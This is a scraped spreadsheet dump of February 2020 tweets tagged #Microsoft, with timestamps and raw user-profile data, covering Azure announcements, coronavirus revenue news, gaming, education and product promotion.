    <t>{'id': 64386492, 'id_str': '64386492', 'name': 'ðŸ‡®ðŸ‡³ Manoj Kuruvanthody ðŸ‡®ðŸ‡³', 'screen_name': 'kuruvanthody', 'location': 'Bangalore', 'description': 'Cyber Security Pro | Rain Water Harvesting &amp; Lakes Enthusiast | Budding Musician - Carnatic Violin &amp; Singer | Photog', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 255, 'listed_count': 24, 'created_at': 'Mon Aug 10 11:57:06 +0000 2009', 'favourites_count': 156, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1329,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'http://pbs.twimg.com/profile_images/1155307457750523904/V6vkpc8L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155307457750523904/V6vkpc8L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64386492/1565629668',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</si>
  <si>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Thu Feb 27 03:47:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sentinel Insecure Protocols Workbook Implementation Guide https://t.co/4gVJxadBjE #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 03:46:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says #Coronavirus hurting supply chain more than expected https://t.co/fOVBT99BKn</t>
  </si>
  <si>
    <t>Thu Feb 27 03:45:05 +0000 2020</t>
  </si>
  <si>
    <t>Register today for @Axway and @Microsoft webinar on February 27th (French) &amp;amp; March 5th (English version). Discover how Axway #AMPLIFY API Management on @azure benefits your company. #apimanagement #hybrid #microsoft https://t.co/nrAhgiXHtt https://t.co/dyqq5e5J0o</t>
  </si>
  <si>
    <t>Thu Feb 27 03:44:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expects #financial hit from #coronavirus spread https://t.co/nicWAMqEVV</t>
  </si>
  <si>
    <t>Thu Feb 27 03:39:28 +0000 2020</t>
  </si>
  <si>
    <t>I would imagine if someone ported Sonic Adventure 2 Battle to the Xbox and release it as a Repro.
#SonictheHedgehog #Xbox #Microsoft https://t.co/cYHjHiVkCM</t>
  </si>
  <si>
    <t>{'id': 3567081913, 'id_str': '3567081913', 'name': 'Lance Silk / ãƒ©ãƒ³ã‚¹ã‚·ãƒ«ã‚¯', 'screen_name': 'TheOtakuSpartan', 'location': 'Peoria Arizona, USA', 'description': 'I am a Otaku/Gamer that Loves The Halo Franchise, Video Games, Anime/Manga, Cartoons and Movies.ðŸ‘', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 199, 'listed_count': 0, 'created_at': 'Tue Sep 15 03:11:46 +0000 2015', 'favourites_count': 7166, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1801,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'http://pbs.twimg.com/profile_images/1220324739438108673/pzudBW6R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220324739438108673/pzudBW6R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3567081913/1564514228',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</si>
  <si>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03:38:06 +0000 2020</t>
  </si>
  <si>
    <t>This is fascinating and deserves more praise and publicity.
"Microsoft's plan to store data for 10,000 years on glass"
https://t.co/0eVWlvuiX8
#microsoft #ProjectSilica</t>
  </si>
  <si>
    <t>{'id': 17908657, 'id_str': '17908657', 'name': 'Ryan O. Hicks', 'screen_name': 'rohixx', 'location': 'Denver, CO', 'description': 'Designer, photographer, and adrenaline junkie.', 'url': 'https://t.co/J3rKhZrUsT', 'entities': {'url': {'urls': [{'url': 'https://t.co/J3rKhZrUsT', 'expanded_url': 'http://www.rohicks.com', 'display_url': 'rohicks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 581, 'friends_count': 145, 'listed_count': 39, 'created_at': 'Fri Dec 05 21:32:22 +0000 2008', 'favourites_count': 565, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12550,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'http://pbs.twimg.com/profile_images/770333067630174208/InZDDQT3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/770333067630174208/InZDDQT3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17908657/1497296378', 'profile_link_color': '064780', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 03:35:42 +0000 2020</t>
  </si>
  <si>
    <t>Power BI Solutions &amp;amp; Power BI Consulting
#powerbi #microsoft #powerapps #microsoftflow #office #excel #dashboard #businessintelligence 
Learn more: https://t.co/potL4clKiX
#GNrSysTalks @GNRSystemsInc  @gnrsystems https://t.co/Ow4KHLVdV9</t>
  </si>
  <si>
    <t>Thu Feb 27 03:35:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expects #Windows unit to miss revenue outlook on #coronavirus impact https://t.co/Opg7enpUeW</t>
  </si>
  <si>
    <t>Thu Feb 27 03:35:06 +0000 2020</t>
  </si>
  <si>
    <t>Windows Terminal Preview v0.9 Available For Download, Promises New Features Before v1 Release
https://t.co/JTJdlCZu27
#news #video #tech #microsoft #news #windows #windows10 #windowsterminal 
https://t.co/JTJdlCZu27</t>
  </si>
  <si>
    <t>{'id': 374510050, 'id_str': '374510050', 'name': 'Edivaldo Oliveira', 'screen_name': 'Edivaldoamizade', 'location': 'SÃ£o luis-Ma', 'description': 'a Ãºnica verdade Ã© que vivo.\r\nSinceramente, eu vivo.\r\nMSN:edivaldo_catequista@hotmail.com\r\nFone: (098) 88073689 / 81106363, EDIVALDO', 'url': 'http://t.co/DPHnHiuEh4', 'entities': {'url': {'urls': [{'url': 'http://t.co/DPHnHiuEh4', 'expanded_url': 'https://twitter.com/Edivaldoamizade', 'display_url': 'twitter.com/Edivaldoamizade', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 325, 'friends_count': 1140, 'listed_count': 1, 'created_at': 'Fri Sep 16 12:59:06 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 346,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'http://pbs.twimg.com/profile_images/1565115458/PQAAAPPWzAuGKeWemuL5Y2fmixpnchXhE-WKnT16X4ErzrHFyzr2ONXryBmMD-yQTprNZN1VEU8iaimfYQS_3nwbgVMAm1T1UF-WVQ5HqNrrmzJqFxAMaHwq0oiS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1565115458/PQAAAPPWzAuGKeWemuL5Y2fmixpnchXhE-WKnT16X4ErzrHFyzr2ONXryBmMD-yQTprNZN1VEU8iaimfYQS_3nwbgVMAm1T1UF-WVQ5HqNrrmzJqFxAMaHwq0oiS_normal.jpg',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</si>
  <si>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Thu Feb 27 03:33:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft doesnt expect to meet #sales guidance on #Windows and #Surface #computers due to #coronavirus https://t.co/c7DmHOkljy</t>
  </si>
  <si>
    <t>Thu Feb 27 03:33:04 +0000 2020</t>
  </si>
  <si>
    <t>Learn more about popular #word features here! #microsoft https://t.co/bIxy9LlGSq https://t.co/p0Q1F63oaH</t>
  </si>
  <si>
    <t>{'id': 1152338403679244288, 'id_str': '1152338403679244288', 'name': 'Alex Palzewicz', 'screen_name': 'APalzewicz', 'location': '', 'description': 'Legal software consultant with Affinity Consulting. Our mission is to inspire, enable, and empower legal teams to work smarter, not harder.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 121, 'listed_count': 0, 'created_at': 'Fri Jul 19 22:04:19 +0000 2019', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 121, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1152338785914540033/Qyj-fSYu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152338785914540033/Qyj-fSYu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1152338403679244288/1564678593',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</si>
  <si>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03:32:55 +0000 2020</t>
  </si>
  <si>
    <t>Only 1 week left until the Melbourne Microsoft IoT in Action event! Come along and chat to our team about our WISE-PaaS DeviceOn system that enables remote management and monitoring of devices across multiple sites. Register - https://t.co/VeyC0b1oaG 
#IoTinActionMS #microsoft https://t.co/YBkvpWUn6M</t>
  </si>
  <si>
    <t>{'id': 632498805, 'id_str': '632498805', 'name': 'Advantech Australia', 'screen_name': 'AdvantechAU', 'location': 'Melbourne, Victoria', 'description': 'Industrial Computer Manufacturer - Co-creating the future of IoT', 'url': 'http://t.co/5tq2anDJUU', 'entities': {'url': {'urls': [{'url': 'http://t.co/5tq2anDJUU', 'expanded_url': 'http://www.advantech.net.au', 'display_url': 'advantech.net.au', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 163, 'friends_count': 116, 'listed_count': 23, 'created_at': 'Tue Jul 10 23:58:04 +0000 2012', 'favourites_count': 200, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 332,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'http://pbs.twimg.com/profile_images/481222893255131137/LaO8pkcw_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/481222893255131137/LaO8pkcw_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/632498805/1482362431', 'profile_link_color': '004280',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</si>
  <si>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03:30:04 +0000 2020</t>
  </si>
  <si>
    <t>XAMPP 32 Bit Download for Windows XP, Vista, 7, 8 and 10
See: https://t.co/s8UTPn8LF3
@isrgrajan #ThursdayMotivation #IsrgRajan #Apache #Apache_Friends #Macintosh #Microsoft #MySQL #PHP #Windows #XAMPP https://t.co/AQhLCCiTyx</t>
  </si>
  <si>
    <t>{'id': 84330425, 'id_str': '84330425', 'name': 'Isrg Rajan', 'screen_name': 'isrgrajan', 'location': 'New Delhi - India', 'description': 'Entrepreneur, columnist and Founder of Isrg KBâ€” https://t.co/z1f0suDGwx', 'url': 'https://t.co/ZfoYtoq7Lc', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZfoYtoq7Lc', 'expanded_url': 'http://isrg.me', 'display_url': 'isrg.me', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/z1f0suDGwx', 'expanded_url': 'http://isrgrajan.com', 'display_url': 'isrgrajan.com', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 3300, 'friends_count': 83, 'listed_count': 43, 'created_at': 'Thu Oct 22 13:55:54 +0000 2009', 'favourites_count': 444, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26179,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'http://pbs.twimg.com/profile_images/1190988064765743106/FJrzpCN1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190988064765743106/FJrzpCN1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84330425/1572788629', 'profile_link_color': 'FAFAFA',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</si>
  <si>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03:28:00 +0000 2020</t>
  </si>
  <si>
    <t>How to Cross Reference Cells Between #Microsoft #Excel #Spreadsheets: https://t.co/FyRO62FIm6 #tutorial</t>
  </si>
  <si>
    <t>{'id': 66153685, 'id_str': '66153685', 'name': 'Reis Lima Quarteu', 'screen_name': 'reisquarteu', 'location': 'BraganÃ§a, Portugal', 'description': 'Reis Quarteu. Director da 3-in, empresa de desenvolvimento de websites, pÃ¡ginas web, portais web, lojas de comÃ©rcio eletrÃ³nico, ecommerce.', 'url': 'http://t.co/pwm2PZyFBp', 'entities': {'url': {'urls': [{'url': 'http://t.co/pwm2PZyFBp', 'expanded_url': 'http://www.facebook.com/3inWebSites', 'display_url': 'facebook.com/3inWebSites', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26463, 'friends_count': 18160, 'listed_count': 413, 'created_at': 'Sun Aug 16 17:33:57 +0000 2009', 'favourites_count': 57586, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 76213,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'http://pbs.twimg.com/profile_images/536804874600460288/2cg_2akY_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/536804874600460288/2cg_2akY_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66153685/1354617507', 'profile_link_color': '0084B4',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</si>
  <si>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Thu Feb 27 03:26:53 +0000 2020</t>
  </si>
  <si>
    <t>Gmail Is Catching More Malicious Attachments With Deep Learning. Users of Gmail get 300 billion attachments each week.
https://t.co/bt9FFmJuee
#DeepLearning #AI #Google #Gmail #spam #Phishing #Malware #RSAConference #microsoft #PDF #macro #Excel https://t.co/pSn05ply3z</t>
  </si>
  <si>
    <t>Thu Feb 27 03:20:14 +0000 2020</t>
  </si>
  <si>
    <t>Hey guys, going live on Mixer in 15 minutes to play some Smite with some friends! Come on over and hang for a bit? Head on over to:
https://t.co/cYqDTRQ6ox
#minibuffs #Smite #smiteGame #hirez #XboxOne #microsoft #Mixer #mixerstreamer #mixerstreamersconnect #mixercommunity https://t.co/EovdSOaNj4</t>
  </si>
  <si>
    <t>{'id': 320934983, 'id_str': '320934983', 'name': 'Larry v.4.25', 'screen_name': 'RedTwtrRanger', 'location': 'Bakersfield, CA', 'description': 'Certified 10 Second Reviewer! Follow me for thought provoking Mehs. \n@minibuffs community member\nIG: Larrix43  YouTube: MrLarrix  \n#ThangLife', 'url': 'https://t.co/KNP62Z83qw', 'entities': {'url': {'urls': [{'url': 'https://t.co/KNP62Z83qw', 'expanded_url': 'https://mixer.com/Larrix43', 'display_url': 'mixer.com/Larrix43', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 279, 'friends_count': 1856, 'listed_count': 1, 'created_at': 'Mon Jun 20 19:22:30 +0000 2011', 'favourites_count': 7982, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8565, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C0E8ED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229682680389758976/aAwo_9ce_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229682680389758976/aAwo_9ce_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/320934983/1355913275', 'profile_link_color': '333333', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 03:18:58 +0000 2020</t>
  </si>
  <si>
    <t>Learn more about how a field services company optimizes operations with help from #Microsoft and Tidestone https://t.co/8BgPmtgeEK 
#FieldService #MSDyn365 #MSDyn365BC https://t.co/KuOW8SJQFt</t>
  </si>
  <si>
    <t>Thu Feb 27 03:15:56 +0000 2020</t>
  </si>
  <si>
    <t>Run Forrest run!!! Is what I repeat to Access every time I have to test my queries #computers #access #microsoft #Databases https://t.co/BLe2Qf8sDd</t>
  </si>
  <si>
    <t>{'id': 743533957988253696, 'id_str': '743533957988253696', 'name': 'Sheyllah Ehlert', 'screen_name': 'sheyllah0825', 'location': 'Minnesota, USA', 'description': 'Life is what we make out of it...what are you doing with yours?\nFT student, FT IT Analyst, love travelling, cooking, computers, music, art, a good book and wine', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 149, 'listed_count': 0, 'created_at': 'Thu Jun 16 20:01:24 +0000 2016', 'favourites_count': 2533, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 869,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'http://pbs.twimg.com/profile_images/1233536295365939200/CMS8-nMk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233536295365939200/CMS8-nMk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/743533957988253696/1582933018',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</si>
  <si>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03:10:55 +0000 2020</t>
  </si>
  <si>
    <t>WHALES WILL HAVE NO PROBLEM SLAPPING $ALPP.
THE SAME PLAYERS BUYING #TESLA, #ORACLE, #MICROSOFT, #SALESFORCE, #AMAZON,
#SANMINA, #JABIL, #FLEXTRONICS, #GOOGLE..
THEY WILL SLAP $$$ $ALPP WITH EASE ONCE THEY FINDS OUT $60-$90+ MILLION
DOLLARS COMPANY'S AWAITS #NYSE 2020.
$ALPP  https://t.co/Np3fmHJRuW</t>
  </si>
  <si>
    <t>{'id': 1135121006790471680, 'id_str': '1135121006790471680', 'name': 'Chaka', 'screen_name': 'Chaka20477958', 'location': 'California, USA', 'description': "INVESTING IS ONE'S OWN CHOICE. NO EXCUSES...\n$ALPP IS ( MY  #1 PICK ) GOING TO #NASDAQ  #NYSE 2020.\n#LIFE-#CHANGING #MONEY.\nðŸ”¥ðŸ’°ðŸ§§ðŸ˜Ž", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 719, 'friends_count': 746, 'listed_count': 2, 'created_at': 'Sun Jun 02 09:48:32 +0000 2019', 'favourites_count': 7137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8077,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'http://pbs.twimg.com/profile_images/1212715632023617536/iKzCHFkQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212715632023617536/iKzCHFkQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1135121006790471680/1578032711',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</si>
  <si>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03:10:01 +0000 2020</t>
  </si>
  <si>
    <t>RIP: Windows 10 live tiles reportedly getting killed by Microsoft https://t.co/KRB5XSLEdq via @Snapzu #windows #windows10 #microsoft</t>
  </si>
  <si>
    <t>{'id': 2544589878, 'id_str': '2544589878', 'name': 'Snapzu Tech/Gadgets', 'screen_name': 'Snapzu_Tech', 'location': 'Connect with fellow bloggers: ðŸ‘‡', 'description': 'Official #Technology section of @Snapzu. https://t.co/8FZNjgA8v2! RUN A BLOG? Offer community access &amp; grow your email list 3x faster! https://t.co/vcHcIJGEm0', 'url': 'https://t.co/K0qXno7bVW', 'entities': {'url': {'urls': [{'url': 'https://t.co/K0qXno7bVW', 'expanded_url': 'http://www.snapzu.com/i/teamsnapzu/to/bes', 'display_url': 'snapzu.com/i/teamsnapzu/tâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8FZNjgA8v2', 'expanded_url': 'http://snapzu.com/n/tech', 'display_url': 'snapzu.com/n/tech', 'indices': [41, 64]}, {'url': 'https://t.co/vcHcIJGEm0', 'expanded_url': 'https://goo.gl/vFoJyE', 'display_url': 'goo.gl/vFoJyE', 'indices': [135, 158]}]}}, 'protected': False, 'followers_count': 1703, 'friends_count': 2450, 'listed_count': 183, 'created_at': 'Tue Jun 03 23:23:45 +0000 2014', 'favourites_count': 128230, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31721,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'http://pbs.twimg.com/profile_images/473968524117827584/mEKj3EG-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/473968524117827584/mEKj3EG-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2544589878/1401837860',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</si>
  <si>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03:09:49 +0000 2020</t>
  </si>
  <si>
    <t>Our top news tonight; Corporat giant @Microsoft was diagnosed w/ rare case of Restless Start Disorder. We can only hope, that it's fatal. 
 https://t.co/ctNfRa0PKO
#RSD #Microsoft #Windows #RestlessStartDisorder</t>
  </si>
  <si>
    <t>{'id': 2555174318, 'id_str': '2555174318', 'name': 'ðŸ“¹UnitedStreamersðŸŽ®', 'screen_name': 'United_Streamer', 'location': 'https://twitch.tv/jollyriffic', 'description': "Hi i'm Jolly, i'm a Radical Truth dropper\nLost access to my main account. so i post here now.", 'url': 'https://t.co/8NbT6FcRhS', 'entities': {'url': {'urls': [{'url': 'https://t.co/8NbT6FcRhS', 'expanded_url': 'https://www.facebook.com/groups/TwitchStreamersUnited', 'display_url': 'facebook.com/groups/TwitchSâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10920, 'friends_count': 18, 'listed_count': 159, 'created_at': 'Sun Jun 08 17:16:24 +0000 2014', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25247,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'http://pbs.twimg.com/profile_images/841843306896216064/QRSe3qUF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/841843306896216064/QRSe3qUF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2555174318/1554608985', 'profile_link_color': '3F66DB',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</si>
  <si>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03:09:30 +0000 2020</t>
  </si>
  <si>
    <t>#RSA &amp;amp; #ServiceNow join #Microsoft Intelligent Security Association ( #MISA ) https://t.co/FBLPDjkTEi</t>
  </si>
  <si>
    <t>Thu Feb 27 03:05:59 +0000 2020</t>
  </si>
  <si>
    <t>Azure News:
A8  A11 Azure Virtual Machine sizes will be retired on March 1, 2021
We recommend moving your high performance computing (HPC) workloads to another HPC Virtual Machine size.
https://t.co/5ThiEdnB4h
#azure #microsoft</t>
  </si>
  <si>
    <t>Azure News:
Public IP prefix static IP addresses meter ID changes 
Effective April 1, 2020, the resource GUIDs (also known as meter IDs) of public IP prefix standard static IP addresses in the US Gov region will change.
https://t.co/podoXsshvO
#azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 03:05:58 +0000 2020</t>
  </si>
  <si>
    <t>Azure News:
Azure Load Balancer TCP resets on idle timeout is now available
Azure Load Balancer TCP resets on idle timeout is now generally available in all Azure regions.
https://t.co/DGfWn5a7EF
#azure #microsoft</t>
  </si>
  <si>
    <t>Azure News:
Fileless attack detection for Linux is now in preview
Azure Security Center is extending fileless attack detection for Linux, in addition to Windows.
https://t.co/syHM2HMWTV
#azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 03:00:47 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- February 26, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Thu Feb 27 03:00:46 +0000 2020</t>
  </si>
  <si>
    <t>I like naked Donald Trump #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 03:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Check this article that shows the Benefits and Importance of Asset Management!
https://t.co/rsCDdmLyNi
#logiframe #advisory #technology #outsourcing #microsoft #xero #jakarta #southjakarta #startup #startuplife #consulting #consultancy #business #fintech #cloudaccounting https://t.co/N4zEtj3lui</t>
  </si>
  <si>
    <t>Thu Feb 27 02:56:35 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020
https://t.co/xhHfrLsFFa
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Thu Feb 27 02:56:16 +0000 2020</t>
  </si>
  <si>
    <t>Welcome Wednesday!  | 117/200 Followers! https://t.co/91xnNI1cB2 #fortnite #fortniteseason2 #Microsoft #xbox #pc #pcgaming #twitch #twitchtv #twitchstreamer</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:44 +0000 2020</t>
  </si>
  <si>
    <t>This awesome Seventh Grader is truly showcasing the sheer power of Minecraft and how when you think outside the box you can truly make a big impact!
#Microsoft #Education #Minecraft https://t.co/OAxl45rI5e</t>
  </si>
  <si>
    <t>{'id': 34437713, 'id_str': '34437713', 'name': "Paul O'Malley [MSFT]", 'screen_name': 'paulomalley', 'location': 'Sydney, New South Wales', 'description': 'So I work for Microsoft now, but all thoughts posted here are my own opinions.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 448, 'friends_count': 822, 'listed_count': 13, 'created_at': 'Wed Apr 22 23:14:38 +0000 2009', 'favourites_count': 2272, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8070, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209817716158128128/YW1pnLnu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209817716158128128/YW1pnLnu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34437713/1549676234', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:35 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:28 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 02:51:43 +0000 2020</t>
  </si>
  <si>
    <t>#fyi #microsoft's #edgebrowser now has a legit extension store!! It's also based on @ChromiumDev codebase (from which @googlechrome is derived) so it can use Chrome extensions (though most of them are trash). I feel like @MicrosoftEdge put on it's #bigboypants!  https://t.co/wkmQ583Jpk</t>
  </si>
  <si>
    <t>{'id': 722459530760732673, 'id_str': '722459530760732673', 'name': 'Durham Bell', 'screen_name': 'durham_bell', 'location': '', 'description': 'Bespoke information technology consultant. Web developer/designer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 129, 'listed_count': 0, 'created_at': 'Tue Apr 19 16:19:09 +0000 2016', 'favourites_count': 169, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 837, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/722505450265133056/BOwmreE5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/722505450265133056/BOwmreE5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/722459530760732673/1461086289',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</si>
  <si>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02:49:49 +0000 2020</t>
  </si>
  <si>
    <t>I officially go deeper that rumor has it that there was going to be a Halo game plan for the GBA but cancelled.
#HALO #Xbox #Nintendo #Microsoft https://t.co/EHbdBq7ir7</t>
  </si>
  <si>
    <t>Thu Feb 27 02:49:10 +0000 2020</t>
  </si>
  <si>
    <t>#NamyaJoshi, a 13-year-old, has been helping teachers of her school convert their class lessons into interactive Minecraft sessions.
https://t.co/1PnS8QccwM
.
#girlsfutureready #STEM #WomenInScience #Microsoft #Minecraft</t>
  </si>
  <si>
